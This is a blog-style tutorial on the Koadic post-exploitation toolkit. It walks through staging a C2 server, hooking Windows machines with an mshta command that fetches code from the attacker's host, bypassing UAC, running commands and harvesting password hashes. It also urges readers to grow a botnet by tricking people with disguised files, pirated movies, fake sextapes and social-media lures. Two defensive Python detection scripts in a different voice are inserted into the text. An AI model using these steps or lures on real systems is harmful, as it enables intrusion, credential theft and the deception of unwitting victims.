
KOADIC🤖: For your Windows Post-Exploitation💀 zombies & Botnets needs😈

alvin gitonga

CyberMorans🤗

The Koadic post-exploitation toolkit😈 serves as an alternative to tools like Meterpreter and PowerShell Empire🤨. While there are some differences in how payloads & exploits are delivered, Koadic provides a fully-featured environment to remotely perform tasks on an exploited Windows system🤫

Koadic provides two categories of functions: stagers and implants 😏


These allow hackers😈 to monitor and control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host, working with practically every version of Windows. It does this entirely in memory to evade detection and can also encrypt its own web C2 communications🙈


Stagers are used to create the actual remote-access connections through different Windows-based processes, and implants are used to complete tasks on systems which are already connected as zombie machines over the stager connection☠️

These 🙊 implants can execute commands, retrieve system keys and password hashes, play video and even take pictures with the webcam on the zombie device.💀

So, Morans, let's do this💪

🚀 Set up Koadic 🤖

Koadic can be run by entering this on the terminal👇

koadic 

The most useful command for an overview of how to use Koadic is 'help'👇

The 'help' command provides an overview of the different commands😎 available. Koadic functions similarly to other frameworks such as Metasploit🥳. It allows individual modules to be loaded and configured. Once a module is selected and its parameters are set, the module can be run😱. Koadic also provides autocomplete triggered by pressing Tab, just like Metasploit and Meterpreter😌


First, load the mshta stager by running👇

use stager/js/mshta

The stager allows us to define where the Koadic command & control👽 is accessed by any "zombie" devices. You can view these settings by running 'info' once the stager is selected👇

The stager allows us to define the IP, port, and expiry date of the C&C, as well as keys and certificates if desired. The default port is 9999. Make sure the "SRVHOST" IP value matches your IP on your local network, or the VPS or server that Koadic is running on🤖. To set it manually, run the command below, where IP is the desired IP address for the staging server👇

set SRVHOST IP

Once the staging server is configured, it's ready🤖. Launch the stager by typing 'run' on the Koadic command line and hitting Enter👇


🚀 Hook your first Zombie PC to the C&C 🤖

A Windows PC can be connected to the Koadic "mshta" staging server by running just one line in cmd😰. This command begins with 'mshta' followed by the IP and port of the staging server. The command can also be found in the Koadic command log itself, as it is shown after running the stager👇

mshta http://192.168.0.105:9999/LJgy7

Once this command is run, the Windows device will be connected as a zombie to the c&c 👍
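For the blue-team side of this, Morans: that one-liner is also exactly what you hunt for in process-creation telemetry. The Python below is an added detection example, not code from this post or from Koadic. It runs two heuristics over a handful of constructed Sysmon-style process-creation records (the events, field names, paths and the LAB\alice user are made up for illustration): mshta.exe launched with an http(s) URL on its command line, and mshta.exe spawning a shell or script host, which is what running commands through a hooked script host looks like on the endpoint.

```python
"""
Added detection example (not from the post or from Koadic): flag the
mshta-based staging pattern in Windows process-creation telemetry.
All events below are constructed, Sysmon Event ID 1 style; field names,
paths, hosts and users are illustrative assumptions.
"""
import json
import re

# Constructed sample events, not real telemetry. The first two mirror what the
# stager one-liner and a follow-up command would look like; the last two are benign.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.168.0.105:9999/LJgy7",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "LAB\\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "User": "LAB\\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Program Files\Vendor\installer.exe", "User": "LAB\\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "LAB\\alice"},
]
# The same events as a JSON-lines export, the form a SIEM or EDR would hand you.
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Children of mshta.exe that indicate the HTA is being used to run commands.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe"}


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule that fires for one process-creation event."""
    hits = []
    if event.get("EventID") != 1:
        return hits
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    # Rule 1: mshta pulling its script from a remote URL. That is the staging
    # one-liner itself; legitimate .hta usage almost always names a local file.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_url")
    # Rule 2: mshta spawning a shell or script host, i.e. an HTA running commands
    # on the box rather than just rendering a dialog.
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawns_shell")
    return hits


def scan(events):
    """(event index, rule names) for every event that triggered at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


def scan_jsonl(text):
    """Same as scan(), but over a JSON-lines export."""
    return scan([json.loads(line) for line in text.splitlines() if line.strip()])


if __name__ == "__main__":
    for idx, rules in scan_jsonl(SAMPLE_JSONL):
        print(f"event {idx}: {', '.join(rules)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Only the first two constructed events fire; the vendor installer that runs a local .hta and the notepad launch stay quiet, which is the point of keying on a remote URL and on the parent/child pair rather than on mshta.exe alone.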

In a real-world attack😈, the command would generally be executed by another program, a USB Rubber Ducky, or an application exploit😎, rather than simply being run by the user within the command prompt. It also lets you gather a lot of zombies for a botnet, maybe. To grow and propagate this botnet of zombies👇
  1. 👉 You can write a bash/shell script that executes the command

  2. 👉 you can use steganography to embed this command on a multimedia file (jpg, png etc) and share it on a group on whatsapp or telegram

  3. 👉 you can use document macros like word, oneNote and PDFs

  4. 👉 You can use a .exe disguised as a game and share it on discord or twitch

  5. 👉 You can use a .scr file since it works like a .exe but few people know that.

  6. 👉 You can disguise it as something interesting and drop it on pirate bay...the latest movie or a game crack, or a sextape

  7. 👉 Social Engineering & Treachery -- Telling people on Twitter and Facebook to open cmd and enter the command supposedly to improve their internet connection or check if they can mine crypto

  8. ....etc....get creative and grow that botnet

Run this on the target windows machine👇


After the command is run, we can confirm that the zombie is connected by running the 'zombies' command within Koadic👇


The first zombie connected will be assigned the ID of 0 (zero). To view more info on this zombie, run the command👇

zombies 0

This device is already pwnd😎, but privileges are not yet elevated😔

Next, we'll look at gaining additional user privileges on the zombie machine🤤


🚀 Elevate & Escalate privileges 🤖

To test privilege escalation against the Windows machine, use the "Bypass User Account Control" implant😏. We can load this by running within Koadic 👇

use implant/elevate/bypassuac_eventvwr

Then, set the payload value in order to have the implant run. You can leave the value of "ZOMBIE" as "ALL" to attack all zombies, or set it to the specific zombie you wish to attack. To adjust the payload value, run the command 👇

set PAYLOAD 0

After the payload is set, we can launch the UAC bypass attempt by simply executing 'run' from the Koadic command line👇

When the task is complete, check that the privilege escalation attack was successful 🥲 by checking the zombie information. To see the status of the first zombie device, run the 'zombies 0' command 👇

When the "Elevated" status shows "YES!" the Windows device is now hooked and privilege escalation complete🥳🥳🥳
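And the defender's view of that implant: the Python below is an added detection example, not code from this post or from Koadic. It assumes the publicly documented mechanism of the eventvwr UAC bypass (a per-user .msc file handler written under HKCU\Software\Classes\mscfile\shell\open\command, which the auto-elevating eventvwr.exe then launches instead of mmc.exe) and runs two rules over constructed Sysmon-style events: a registry value set (Event ID 13) on that per-user key, and eventvwr.exe spawning any child other than mmc.exe. The events, the SID, the paths and the "Details" value are made up for illustration.

```python
r"""
Added detection example (not from the post or from Koadic) for the
"bypassuac_eventvwr" implant. Assumes the publicly documented mechanism of
the eventvwr UAC bypass: a per-user .msc handler is written under
HKCU\Software\Classes\mscfile\shell\open\command, and the auto-elevating
eventvwr.exe then launches that handler instead of mmc.exe.
Events are constructed in Sysmon style (ID 13 = registry value set,
ID 1 = process creation); field names, SID and paths are illustrative.
"""
import re

# Sysmon reports HKCU paths as HKU\<SID>\...; the hijack key is the per-user
# override of the .msc file handler, which normally does not exist at all.
HIJACK_KEY_RE = re.compile(
    r"^HKU\\(S-1-5-21-[\d-]+)\\Software\\Classes\\mscfile\\shell\\open\\command",
    re.IGNORECASE)

SAMPLE_EVENTS = [
    # the hijack: a per-user .msc handler being set (constructed value)
    {"EventID": 13, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "Details": "mshta http://192.168.0.105:9999/LJgy7"},
    # the trigger: auto-elevated eventvwr starting something other than mmc.exe
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe", "IntegrityLevel": "High"},
    # benign: eventvwr starting mmc.exe, which is what it normally does
    {"EventID": 1, "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe", "IntegrityLevel": "High"},
    # benign: unrelated per-user registry write
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000000)"},
]


def basename(path):
    """Last path component, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule that fires for one event."""
    hits = []
    eid = event.get("EventID")
    # Rule 1: a value written under the per-user mscfile handler key.
    if eid == 13 and HIJACK_KEY_RE.match(event.get("TargetObject", "")):
        hits.append("mscfile_handler_hijack")
    # Rule 2: eventvwr.exe launching anything except the management console.
    if eid == 1:
        parent = basename(event.get("ParentImage", ""))
        child = basename(event.get("Image", ""))
        if parent == "eventvwr.exe" and child != "mmc.exe":
            hits.append("eventvwr_unexpected_child")
    return hits


def affected_sid(event):
    """SID whose hive was modified, or None if the event is not the hijack write."""
    m = HIJACK_KEY_RE.match(event.get("TargetObject", ""))
    return m.group(1) if m else None


def scan(events):
    """(event index, rule names) for every event that triggered at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        sid = affected_sid(SAMPLE_EVENTS[idx])
        suffix = f" (user SID {sid})" if sid else ""
        print(f"event {idx}: {', '.join(rules)}{suffix}")
```

On a clean machine the per-user mscfile key does not exist, so even a single hit on the first rule deserves a look, and the SID tells you whose profile to clean up. The second rule is broader than this one implant: it catches any handler hijack that rides on eventvwr.exe, not only Koadic's.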



🚀 Koadic Post-Exploitation Implants 🤖

Now that we have an exploited device👏 with elevated privileges👏, there are a number of rootkit functions😈 we can perform from the Koadic C&C. The "implant" modules, as shown below, show a few of the capabilities available in Koadic👇


The "exec_cmd" implant allows you to run any command on the Windows system 🥲. To load this implant, run the command👇

use implant/manage/exec_cmd

To set a command, use the 'set' command, same as when changing settings for other modules. To set the command to be run to 'dir' 💨, which returns a list of files and directories, run the command👇

set CMD dir

To confirm these settings were changed, run 'info' to view the module information👇

Once the implant settings are in place, simply type 'run' and hit Enter to run the module👏👏

Other implants, such as the "gathering" tools shown below, attempt to capture important information such as user account details😜 and password hashes and send them to the command-and-control server👇

Koadic also provides several "fun" 😜implants. The "voice" implant uses Windows' integrated text-to-speech tools 😏 to "speak" a message on the zombie computer😜


To use this implant, first run 'use implant/fun/voice'. The message can be set with 'set MESSAGE ' followed by the desired message to be spoken🤭. The specific zombies can also be set in the same way as in the previous modules, or it can be left at the default value of "ALL" to run on all zombies. Type 'run' and hit Enter👇


While these attacks have mixed success🥳, the majority of the rootkit implants are very effective, even on modern versions of Windows🤨. The limited chance of detection and the potential for automation using Python scripts make Koadic a potent remote-access toolkit capable of carrying out complex attacks😋


🚀Conclusion 🤖

Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff...😋


Follow me on twitter for daily Infosec Memes and shenanigans😝


Morans,

Thank you for taking the time, and I hope you learned something new. Like and leave a comment/review, and as always, stay awesome! 😋👊 💪
